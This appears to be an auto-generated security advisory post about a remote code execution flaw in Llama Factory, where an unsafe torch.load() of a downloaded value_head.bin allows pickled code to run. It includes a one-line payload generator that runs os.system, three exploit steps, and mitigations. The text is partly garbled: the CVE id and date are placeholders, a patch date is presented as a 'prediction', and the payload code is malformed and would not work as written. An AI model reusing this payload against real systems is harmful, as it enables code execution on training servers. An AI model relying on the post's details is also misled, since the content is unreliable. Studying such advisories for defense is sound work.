Llama Factory, Remote Code Execution, CVE-2024-XXXX (Critical)

Listen to this Post

How the CVE Works

The vulnerability occurs in Llama Factory when loading `vhead_file` during the training process. Attackers can exploit this by supplying a malicious `Checkpoint path` via the WebUI. The `adapter_name_or_path` parameter is passed to the training process, which fetches a `value_head.bin` file from Hugging Face. This file is loaded using `torch.load()` without the `weights_only=True` security parameter, allowing arbitrary code execution. Since torch versions below 2.6 default to weights_only=False, and Llama Factory only requires torch>=2.0.0, the system remains vulnerable to RCE.

DailyCVE Form

Platform: Llama Factory
Version: <=0.9.3
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2024-XX-XX

Prediction: Patch expected by 2024-07-15

What Undercode Say

Exploitable Code (src/llamafactory/model/model_utils/valuehead.py)
vhead_file = torch.load("value_head.bin") Missing weights_only=True
Malicious Payload Generation
python3 -c "import torch; torch.save({'<strong>reduce</strong>': (exec, ('import os; os.system(\"touch HACKED\")',)}, 'value_head.bin')"

How Exploit

  1. Set `Checkpoint path` to a malicious Hugging Face repo.

2. Trigger Reward Modeling training.

3. Server executes attacker’s payload.

Protection from this CVE

  • Update to Llama Factory >0.9.3.
  • Enforce torch.load(weights_only=True).
  • Restrict Hugging Face model sources.

Impact

  • Arbitrary command execution.
  • Data breaches.
  • System compromise.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top